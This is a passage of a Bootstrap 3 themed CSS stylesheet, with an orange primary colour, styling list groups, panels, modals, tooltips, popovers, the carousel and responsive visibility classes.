  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger,
button.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading,
button.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
button.list-group-item-danger:hover,
a.list-group-item-danger:focus,
button.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
button.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
button.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus,
button.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .panel-heading + .panel-collapse > .list-group .list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-right: 15px;
  padding-left: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  margin-bottom: 0;
  border: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #ff8800;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #ff8800;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ff8800;
}
.panel-primary > .panel-heading .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ff8800;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0;
}
.well-sm {
  padding: 9px;
  border-radius: 0;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  filter: alpha(opacity=20);
  opacity: 0.2;
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-bottom: 0;
  margin-left: 5px;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 12px;
  filter: alpha(opacity=0);
  opacity: 0;
}
.tooltip.in {
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.tooltip.top {
  padding: 5px 0;
  margin-top: -3px;
}
.tooltip.right {
  padding: 0 5px;
  margin-left: 3px;
}
.tooltip.bottom {
  padding: 5px 0;
  margin-top: 3px;
}
.tooltip.left {
  padding: 0 5px;
  margin-left: -3px;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  right: 5px;
  bottom: 0;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  background-color: #000000;
  border-radius: 0;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 14px;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow:after {
  content: "";
  border-width: 10px;
}
.popover.top > .arrow {
  bottom: -11px;
  left: 50%;
  margin-left: -11px;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  border-bottom-width: 0;
}
.popover.top > .arrow:after {
  bottom: 1px;
  margin-left: -10px;
  content: " ";
  border-top-color: #ffffff;
  border-bottom-width: 0;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
  border-left-width: 0;
}
.popover.right > .arrow:after {
  bottom: -10px;
  left: 1px;
  content: " ";
  border-right-color: #ffffff;
  border-left-width: 0;
}
.popover.bottom > .arrow {
  top: -11px;
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.popover.bottom > .arrow:after {
  top: 1px;
  margin-left: -10px;
  content: " ";
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  right: 1px;
  bottom: -10px;
  content: " ";
  border-right-width: 0;
  border-left-color: #ffffff;
}
.popover-title {
  padding: 8px 14px;
  margin: 0;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1 -1 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner > .item {
  position: relative;
  display: none;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000px;
    -moz-perspective: 1000px;
    perspective: 1000px;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  width: 15%;
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
  background-color: rgba(0, 0, 0, 0);
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control.right {
  right: 0;
  left: auto;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
  margin-top: -10px;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  font-family: serif;
  line-height: 1;
}
.carousel-control .icon-prev:before {
  content: "\2039";
}
.carousel-control .icon-next:before {
  content: "\203a";
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  padding-left: 0;
  margin-left: -30%;
  text-align: center;
  list-style: none;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
  border: 1px solid #ffffff;
  border-radius: 10px;
}
.carousel-indicators .active {
  width: 12px;
  height: 12px;
  margin: 0;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  right: 15%;
  bottom: 20px;
  left: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -10px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -10px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -10px;
  }
  .carousel-caption {
    right: 20%;
    left: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-header:before,
.modal-header:after,
.modal-footer:before,
.modal-footer:after {
  display: table;
  content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-header:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-right: auto;
  margin-left: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table !important;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table !important;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table !important;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table !important;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
